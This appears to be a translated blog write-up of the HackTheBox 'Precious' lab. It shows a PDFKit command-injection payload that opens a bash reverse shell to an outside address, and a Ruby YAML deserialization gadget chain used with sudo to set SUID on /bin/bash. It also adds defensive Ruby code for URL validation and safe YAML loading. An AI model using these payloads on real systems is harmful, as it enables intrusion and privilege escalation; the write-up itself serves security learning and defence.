
Hackthebox-Precious

Published: 2022-12-30 18:14:21

USER

Target address: 10.10.11.189

The usual basic recon showed ports 22 and 80 open; visiting port 80 turned up a domain name:

http://precious.htb/

Bind it in the hosts file; once that is done the site can be browsed.


My browser extension reported that the site runs on Phusion Passenger, so I started poking at the site's functionality: it converts a web page into a PDF. Feeding it its own address didn't work, so I stood up a quick server of my own and generated a PDF from that.

Analysing the PDF with ExifTool showed that the tool used to produce it was PDFKit.


Then I found the CVE number: CVE-2022-25765


I found an article that put the payload roughly as
http://example.com/?name=#{' ``'}    (put the command between the backticks and it gets executed; let's try a reverse shell)

http://10.10.16.16/?name=#{'%20`bash -c "sh -i >& /dev/tcp/10.10.16.16/4444 0>&1"`'}


And that got me a shell.
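As an added defensive example (not code from this post and not PDFKit's own API), here is how an application that wraps wkhtmltopdf can keep a user-supplied URL from ever reaching a shell: the URL is parsed and restricted to http(s) with a host and no embedded credentials, characters that cannot occur in a valid URI (the whitespace, backticks and braces the payload above depends on) are rejected up front, and wkhtmltopdf is spawned with an argument array instead of a command string, so no /bin/sh is involved. The function names, the 2048-character limit and the bare wkhtmltopdf invocation are my assumptions for this example; upgrading PDFKit to a release that fixes the CVE remains the primary fix, and this is the defence in depth around it.

```ruby
require 'uri'

# Characters that can never appear in a valid RFC 3986 URI. The sample
# payload relies on whitespace, backticks and braces, so this allow-list
# check rejects it before any subprocess is built.
INVALID_URI_CHARS = /[\s`{}"<>\\|^]/

# Returns true only for an absolute http(s) URL with a host and no
# embedded credentials. Anything the parser refuses, and any other scheme
# (file://, gopher://, ...), is rejected. The 2048 limit is an assumption.
def safe_pdf_source?(raw)
  return false unless raw.is_a?(String) && !raw.empty? && raw.length <= 2048
  return false if raw.match?(INVALID_URI_CHARS)
  uri = URI.parse(raw)
  return false unless %w[http https].include?(uri.scheme)
  return false if uri.host.nil? || uri.host.empty?
  return false unless uri.userinfo.nil?
  true
rescue URI::InvalidURIError
  false
end

# Builds the wkhtmltopdf argument vector. Passing an Array to Kernel#system
# or Process.spawn bypasses the shell entirely, so even a URL that somehow
# carried shell metacharacters reaches wkhtmltopdf as one literal argument.
def wkhtmltopdf_argv(url, output_path)
  raise ArgumentError, "refusing unsafe source: #{url.inspect}" unless safe_pdf_source?(url)
  ['wkhtmltopdf', url, output_path]
end

# Renders the page to a PDF without a shell. Assumes wkhtmltopdf is on PATH;
# not exercised by the checks below.
def render_pdf(url, output_path)
  argv = wkhtmltopdf_argv(url, output_path)
  system(*argv) or raise "wkhtmltopdf failed for #{url}"
  output_path
end
```

The validator deliberately does not try to strip or escape the bad characters: a URL that fails the check is refused, and the argv form means escaping is not what the security of the call rests on.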

Once inside, looking at the directory I found a config file, but it wasn't useful and didn't lead anywhere; what I needed was in the files further along.


ROOT

As usual, I uploaded my little enumeration script and ran it.

None of the CVEs it listed worked, so I fell back to honestly checking what I was allowed to run with sudo -l.

Check the contents of /opt/update_dependencies.rb

I had no idea at all at first; only when I started reading a walkthrough did I notice that the payload was already on my machine.

henry@precious:~$ cat /opt/update_dependencies.rb

# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

# Reads dependencies.yml relative to the current working directory and parses
# it with YAML.load, which on Psych versions before 4 instantiates whatever
# tagged Ruby objects the file names
def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

# Every installed gem as [name, version], sorted by name
def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

# Report, for each gem named in the file, whether the installed version matches
gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end


The documentation says that YAML.load here has a deserialization vulnerability; then look at the YAML file and, in the method_id part, put the command we want to execute.

https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

 ---
 - !ruby/object:Gem::Installer
     i: x
 - !ruby/object:Gem::SpecFetcher
     i: y
 - !ruby/object:Gem::Requirement
   requirements:
     !ruby/object:Gem::Package::TarReader
     io: &1 !ruby/object:Net::BufferedIO
       io: &1 !ruby/object:Gem::Package::TarReader::Entry
          read: 0
          header: "abc"
       debug_output: &1 !ruby/object:Net::WriteAdapter
          socket: &1 !ruby/object:Gem::RequestSet
              sets: !ruby/object:Net::WriteAdapter
                  socket: !ruby/module 'Kernel'
                  method_id: :system
              git_set: chmod +s /bin/bash
          method_id: :resolve 

Then run:

sudo /usr/bin/ruby /opt/update_dependencies.rb

I didn't fully understand it, but in the spirit of finishing today's work today I went through with it: running the one command I was allowed to run got me root.

Then run whoami and you can see you are the root user.
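Added example, not the box's script and not the gist: the same dependency check rewritten so the YAML file cannot carry a gadget chain. YAML.safe_load refuses every !ruby/object tag with Psych::DisallowedClass and refuses aliases, the parsed data is schema-checked down to plain name => version strings, and the file is read from a fixed absolute path rather than the cwd-relative "dependencies.yml" that a sudo rule leaves under the caller's control. The two sample YAML documents, the /etc/precious path, the error class and the function names are constructed for this example.

```ruby
require 'yaml'

# Constructed sample of a well-formed dependencies.yml (not taken from the box).
BENIGN_DEPENDENCIES = <<~'YAML'
  yaml: 0.1.1
  rubygems: 3.2.22
YAML

# Constructed sample that opens the way the gist payload does, with a tagged
# Ruby object but no command. safe_load must refuse it before anything is built.
TAGGED_DEPENDENCIES = <<~'YAML'
  ---
  - !ruby/object:Gem::Installer
      i: x
YAML

class UnsafeDependencyFile < StandardError; end

# Versions are dotted integer sequences; anything else is not a version.
VERSION_RE = /\A\d+(\.\d+)*\z/

# Parses the dependency list with YAML.safe_load: only core scalars, Hash and
# Array come back, aliases are refused, and any !ruby/... tag raises
# Psych::DisallowedClass, so the Gem::Installer / Net::WriteAdapter chain is
# never instantiated. The parsed data is then reduced to String => String.
def parse_dependency_list(text)
  data = YAML.safe_load(text)
  raise UnsafeDependencyFile, 'expected a mapping of gem name => version' unless data.is_a?(Hash)
  data.each_with_object({}) do |(name, version), out|
    version = version.to_s # an unquoted 2.0 parses as a Float; normalise it
    unless name.is_a?(String) && version.match?(VERSION_RE)
      raise UnsafeDependencyFile, "bad entry #{name.inspect} => #{version.inspect}"
    end
    out[name] = version
  end
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError => e
  raise UnsafeDependencyFile, "refusing to load dependency file: #{e.message}"
end

# The comparison the box's script performs, with the installed-gem list passed
# in so it can be exercised without touching RubyGems.
def compare_versions(wanted, installed)
  wanted.each_with_object({}) do |(name, version), report|
    local = installed[name]
    report[name] = if local.nil?          then :missing
                   elsif local == version then :match
                   else                        :differs
                   end
  end
end

# name => version for every installed gem (the same data as list_local_gems).
def installed_gem_versions
  Gem::Specification.map { |g| [g.name, g.version.to_s] }.to_h
end

# Placeholder absolute path for this example: a fixed, root-owned location
# removes the caller's control over which file the sudo-elevated script reads.
DEPENDENCY_FILE = '/etc/precious/dependencies.yml'

def check_dependencies(path = DEPENDENCY_FILE)
  wanted = parse_dependency_list(File.read(path))
  compare_versions(wanted, installed_gem_versions).each do |name, status|
    puts "#{name}: #{status}"
  end
end
```

Psych 4, the default in Ruby 3.1 and later, changed YAML.load itself to behave like safe_load, which is why this deserialization route depends on the older Psych bundled with earlier Rubies; on any version, safe_load plus a path the caller cannot choose closes it.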

From: https://www.cnblogs.com/0x3e-time/p/17015514.html
